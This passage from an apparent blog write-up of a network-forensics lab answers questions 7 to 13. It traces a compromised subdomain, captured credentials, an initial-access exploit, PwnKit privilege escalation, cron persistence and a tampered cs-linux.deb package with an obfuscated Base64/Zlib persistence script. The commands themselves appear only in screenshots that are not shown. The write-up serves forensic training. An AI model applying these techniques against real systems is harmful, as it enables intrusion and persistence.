12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>7. What is the compromised subdomain?</strong></p><p>Filtering for HTTP responses returning 200 OK status codes helps identify the targeted subdomain.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Pqps!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Pqps!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png 424w, https://substackcdn.com/image/fetch/$s_!Pqps!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png 848w, https://substackcdn.com/image/fetch/$s_!Pqps!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png 1272w, https://substackcdn.com/image/fetch/$s_!Pqps!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Pqps!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png" width="1456" height="537" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:537,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Pqps!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png 424w, https://substackcdn.com/image/fetch/$s_!Pqps!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png 848w, https://substackcdn.com/image/fetch/$s_!Pqps!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png 1272w, https://substackcdn.com/image/fetch/$s_!Pqps!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbd66f8c4-8963-4206-83de-7a99fcb37aeb_2189x807.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>8. What email address and password were used to log in?</strong></p><p>Credentials can be extracted from NetworkMiner's parsed data, particularly within the HTTP and SMTP traffic logs.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!c2eF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!c2eF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png 424w, https://substackcdn.com/image/fetch/$s_!c2eF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png 848w, https://substackcdn.com/image/fetch/$s_!c2eF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png 1272w, https://substackcdn.com/image/fetch/$s_!c2eF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!c2eF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png" width="1413" height="63" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:63,&quot;width&quot;:1413,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!c2eF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png 424w, https://substackcdn.com/image/fetch/$s_!c2eF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png 848w, https://substackcdn.com/image/fetch/$s_!c2eF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png 1272w, https://substackcdn.com/image/fetch/$s_!c2eF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F35494ea7-97b1-41b9-b697-01d9ba872288_1413x63.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>9. What command granted the attacker initial access?</strong></p><p>Wireshark&#8217;s HTTP POST request analysis reveals the exploit used for the initial breach.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MEQX!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MEQX!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png 424w, https://substackcdn.com/image/fetch/$s_!MEQX!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png 848w, https://substackcdn.com/image/fetch/$s_!MEQX!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png 1272w, https://substackcdn.com/image/fetch/$s_!MEQX!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MEQX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png" width="1214" height="646" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:646,&quot;width&quot;:1214,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MEQX!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png 424w, https://substackcdn.com/image/fetch/$s_!MEQX!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png 848w, https://substackcdn.com/image/fetch/$s_!MEQX!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png 1272w, https://substackcdn.com/image/fetch/$s_!MEQX!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F098ebe39-4c10-4fae-94d3-75b4f6fef9c9_1214x646.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>10. What is the CVE identifier for the exploited privilege escalation vulnerability?</strong></p><p>By searching the logs for PwnKit, we find its associated CVE identifier online.</p><p><strong>11. What MITRE ATT&amp;CK technique ID was used for persistence?</strong></p><p>Analyzing port 5555&#8217;s traffic stream in Wireshark shows crontab usage for persistence, mapped to T1053.003.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!mY6B!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!mY6B!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png 424w, https://substackcdn.com/image/fetch/$s_!mY6B!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png 848w, https://substackcdn.com/image/fetch/$s_!mY6B!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png 1272w, https://substackcdn.com/image/fetch/$s_!mY6B!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!mY6B!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png" width="806" height="454" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:454,&quot;width&quot;:806,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!mY6B!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png 424w, https://substackcdn.com/image/fetch/$s_!mY6B!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png 848w, https://substackcdn.com/image/fetch/$s_!mY6B!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png 1272w, https://substackcdn.com/image/fetch/$s_!mY6B!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4e7b197c-565d-4338-b44f-a6b967ebd98f_806x454.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>12. What MITRE ATT&amp;CK technique ID corresponds to the tampering on the 'download' subdomain?</strong></p><p>Following the TCP stream for port 5555 shows software tampering, linked to T1195.002 (Compromise Software Supply Chain).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fFbl!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fFbl!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png 424w, https://substackcdn.com/image/fetch/$s_!fFbl!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png 848w, https://substackcdn.com/image/fetch/$s_!fFbl!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png 1272w, https://substackcdn.com/image/fetch/$s_!fFbl!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fFbl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png" width="1456" height="648" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:648,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!fFbl!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png 424w, https://substackcdn.com/image/fetch/$s_!fFbl!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png 848w, https://substackcdn.com/image/fetch/$s_!fFbl!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png 1272w, https://substackcdn.com/image/fetch/$s_!fFbl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f2b0fca-ec93-4e16-9156-7b0500c2503d_1838x818.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>13. What command provided persistence in the cs-linux.deb file?</strong></p><p>Extracting and analyzing cs-linux.deb with Midnight Commander (mc) reveals an obfuscated script. Using CyberChef, we decode Base64 and Zlib compression to reveal the persistence command.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!CvFP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!CvFP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png 424w, https://substackcdn.com/image/fetch/$s_!CvFP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png 848w, https://substackcdn.com/image/fetch/$s_!CvFP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png 1272w, https://substackcdn.com/image/fetch/$s_!CvFP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!CvFP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png" width="400" height="81" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:81,&quot;width&quot;:400,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:3808,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!CvFP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png 424w, https://substackcdn.com/image/fetch/$s_!CvFP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png 848w, https://substackcdn.com/image/fetch/$s_!CvFP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png 1272w, https://substackcdn.com/image/fetch/$s_!CvFP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49fc2afd-ec86-4cd3-b0df-20e6f57e1ee7_400x81.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" 